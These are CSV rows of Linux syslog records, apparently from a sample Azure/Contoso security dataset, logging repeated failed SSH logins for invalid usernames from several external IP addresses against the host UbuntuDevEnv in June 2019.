+3870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:19,UbuntuDevEnv,2019-06-26 13:27:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,125448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+3871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:19,UbuntuDevEnv,2019-06-26 13:27:19,auth,UbuntuDevEnv,info,Invalid user veronique from 157.230.115.27 port 47688,125466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,veronique,157.230.115.2,47688,,
+3872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:19,UbuntuDevEnv,2019-06-26 13:27:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,125466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+3873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:19,UbuntuDevEnv,2019-06-26 13:27:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:21,UbuntuDevEnv,2019-06-26 13:27:20,auth,UbuntuDevEnv,info,Failed password for invalid user teamspeak3 from 196.46.36.144 port 44007 ssh2,125448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,196.46.36.1,44007,,
+3875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:21,UbuntuDevEnv,2019-06-26 13:27:20,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 44007:11: Bye Bye [preauth],125448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,44007,,
+3876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:21,UbuntuDevEnv,2019-06-26 13:27:20,auth,UbuntuDevEnv,info,Disconnected from invalid user teamspeak3 196.46.36.144 port 44007 [preauth],125448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,196.46.36.1,44007,,
+3877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:21,UbuntuDevEnv,2019-06-26 13:27:21,auth,UbuntuDevEnv,info,Failed password for invalid user veronique from 157.230.115.27 port 47688 ssh2,125466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,veronique,157.230.115.2,47688,,
+3878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:21,UbuntuDevEnv,2019-06-26 13:27:21,auth,UbuntuDevEnv,info,Disconnected from invalid user veronique 157.230.115.27 port 47688 [preauth],125466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,veronique,157.230.115.2,47688,,
+3879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:27:21,UbuntuDevEnv,2019-06-26 13:27:21,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 47688:11: Bye Bye [preauth],125466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,47688,,
+3880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:04,UbuntuDevEnv,2019-06-26 13:28:03,auth,UbuntuDevEnv,info,Invalid user hill from 201.48.54.81 port 41986,125614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hill,201.48.54.8,41986,,
+3881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:04,UbuntuDevEnv,2019-06-26 13:28:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,125614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:04,UbuntuDevEnv,2019-06-26 13:28:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:06,UbuntuDevEnv,2019-06-26 13:28:06,auth,UbuntuDevEnv,info,Failed password for invalid user hill from 201.48.54.81 port 41986 ssh2,125614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hill,201.48.54.8,41986,,
+3884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:06,UbuntuDevEnv,2019-06-26 13:28:06,auth,UbuntuDevEnv,info,Disconnected from invalid user hill 201.48.54.81 port 41986 [preauth],125614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hill,201.48.54.8,41986,,
+3885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:06,UbuntuDevEnv,2019-06-26 13:28:06,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 41986:11: Bye Bye [preauth],125614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,41986,,
+3886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:32,UbuntuDevEnv,2019-06-26 13:28:31,auth,UbuntuDevEnv,info,Invalid user git from 194.228.3.191 port 53710,125714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,194.228.3.1,53710,,
+3887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:32,UbuntuDevEnv,2019-06-26 13:28:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:32,UbuntuDevEnv,2019-06-26 13:28:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,125714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:34,UbuntuDevEnv,2019-06-26 13:28:34,auth,UbuntuDevEnv,info,Failed password for invalid user git from 194.228.3.191 port 53710 ssh2,125714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,194.228.3.1,53710,,
+3890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:34,UbuntuDevEnv,2019-06-26 13:28:34,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 53710:11: Bye Bye [preauth],125714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,53710,,
+3891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:34,UbuntuDevEnv,2019-06-26 13:28:34,auth,UbuntuDevEnv,info,Disconnected from invalid user git 194.228.3.191 port 53710 [preauth],125714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,194.228.3.1,53710,,
+3892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:55,UbuntuDevEnv,2019-06-26 13:28:54,auth,UbuntuDevEnv,info,Invalid user web3 from 139.199.34.112 port 54514,125796,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web3,139.199.34.1,54514,,
+3893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:55,UbuntuDevEnv,2019-06-26 13:28:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125796,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:55,UbuntuDevEnv,2019-06-26 13:28:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,125796,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+3895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:56,UbuntuDevEnv,2019-06-26 13:28:56,auth,UbuntuDevEnv,info,Failed password for invalid user web3 from 139.199.34.112 port 54514 ssh2,125796,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web3,139.199.34.1,54514,,
+3896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:57,UbuntuDevEnv,2019-06-26 13:28:57,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 54514:11: Bye Bye [preauth],125796,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,54514,,
+3897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:28:57,UbuntuDevEnv,2019-06-26 13:28:57,auth,UbuntuDevEnv,info,Disconnected from invalid user web3 139.199.34.112 port 54514 [preauth],125796,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web3,139.199.34.1,54514,,
+3898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:29:00,UbuntuDevEnv,2019-06-26 13:29:00,auth,UbuntuDevEnv,info,Invalid user xm from 157.230.115.27 port 36816,125818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xm,157.230.115.2,36816,,
+3899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:29:00,UbuntuDevEnv,2019-06-26 13:29:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,125818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+3900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:29:00,UbuntuDevEnv,2019-06-26 13:29:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:29:02,UbuntuDevEnv,2019-06-26 13:29:02,auth,UbuntuDevEnv,info,Failed password for invalid user xm from 157.230.115.27 port 36816 ssh2,125818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xm,157.230.115.2,36816,,
+3902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:29:02,UbuntuDevEnv,2019-06-26 13:29:02,auth,UbuntuDevEnv,info,Disconnected from invalid user xm 157.230.115.27 port 36816 [preauth],125818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xm,157.230.115.2,36816,,
+3903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:29:02,UbuntuDevEnv,2019-06-26 13:29:02,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 36816:11: Bye Bye [preauth],125818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,36816,,
+3904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:29:50,UbuntuDevEnv,2019-06-26 13:29:49,auth,UbuntuDevEnv,info,Invalid user conception from 196.46.36.144 port 52174,125984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,conception,196.46.36.1,52174,,
+3905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:29:50,UbuntuDevEnv,2019-06-26 13:29:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:29:50,UbuntuDevEnv,2019-06-26 13:29:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,125984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+3907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:29:51,UbuntuDevEnv,2019-06-26 13:29:51,auth,UbuntuDevEnv,info,Failed password for invalid user conception from 196.46.36.144 port 52174 ssh2,125984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,conception,196.46.36.1,52174,,
+3908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:29:52,UbuntuDevEnv,2019-06-26 13:29:51,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 52174:11: Bye Bye [preauth],125984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,52174,,
+3909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:29:52,UbuntuDevEnv,2019-06-26 13:29:51,auth,UbuntuDevEnv,info,Disconnected from invalid user conception 196.46.36.144 port 52174 [preauth],125984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,conception,196.46.36.1,52174,,
+3910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:30:07,UbuntuDevEnv,2019-06-26 13:30:07,auth,UbuntuDevEnv,info,Invalid user smbprint from 201.48.54.81 port 50386,126088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smbprint,201.48.54.8,50386,,
+3911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:30:07,UbuntuDevEnv,2019-06-26 13:30:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:30:07,UbuntuDevEnv,2019-06-26 13:30:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,126088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:30:09,UbuntuDevEnv,2019-06-26 13:30:09,auth,UbuntuDevEnv,info,Failed password for invalid user smbprint from 201.48.54.81 port 50386 ssh2,126088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smbprint,201.48.54.8,50386,,
+3914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:30:10,UbuntuDevEnv,2019-06-26 13:30:09,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 50386:11: Bye Bye [preauth],126088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,50386,,
+3915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:30:10,UbuntuDevEnv,2019-06-26 13:30:09,auth,UbuntuDevEnv,info,Disconnected from invalid user smbprint 201.48.54.81 port 50386 [preauth],126088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smbprint,201.48.54.8,50386,,
+3916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:30:40,UbuntuDevEnv,2019-06-26 13:30:39,auth,UbuntuDevEnv,info,Invalid user miu from 157.230.115.27 port 54176,126267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miu,157.230.115.2,54176,,
+3917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:30:40,UbuntuDevEnv,2019-06-26 13:30:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,126267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+3918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:30:40,UbuntuDevEnv,2019-06-26 13:30:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:30:42,UbuntuDevEnv,2019-06-26 13:30:41,auth,UbuntuDevEnv,info,Failed password for invalid user miu from 157.230.115.27 port 54176 ssh2,126267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miu,157.230.115.2,54176,,
+3920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:30:42,UbuntuDevEnv,2019-06-26 13:30:41,auth,UbuntuDevEnv,info,Disconnected from invalid user miu 157.230.115.27 port 54176 [preauth],126267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miu,157.230.115.2,54176,,
+3921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:30:42,UbuntuDevEnv,2019-06-26 13:30:41,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 54176:11: Bye Bye [preauth],126267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,54176,,
+3922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:31:02,UbuntuDevEnv,2019-06-26 13:31:01,auth,UbuntuDevEnv,info,Invalid user ga from 139.199.34.112 port 42082,126332,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ga,139.199.34.1,42082,,
+3923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:31:02,UbuntuDevEnv,2019-06-26 13:31:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126332,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:31:02,UbuntuDevEnv,2019-06-26 13:31:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,126332,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+3925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:31:04,UbuntuDevEnv,2019-06-26 13:31:03,auth,UbuntuDevEnv,info,Failed password for invalid user ga from 139.199.34.112 port 42082 ssh2,126332,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ga,139.199.34.1,42082,,
+3926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:31:04,UbuntuDevEnv,2019-06-26 13:31:03,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 42082:11: Bye Bye [preauth],126332,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,42082,,
+3927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:31:04,UbuntuDevEnv,2019-06-26 13:31:03,auth,UbuntuDevEnv,info,Disconnected from invalid user ga 139.199.34.112 port 42082 [preauth],126332,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ga,139.199.34.1,42082,,
+3928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:06,UbuntuDevEnv,2019-06-26 13:32:05,auth,UbuntuDevEnv,info,Invalid user webadmin from 201.48.54.81 port 58785,126574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,201.48.54.8,58785,,
+3929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:06,UbuntuDevEnv,2019-06-26 13:32:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
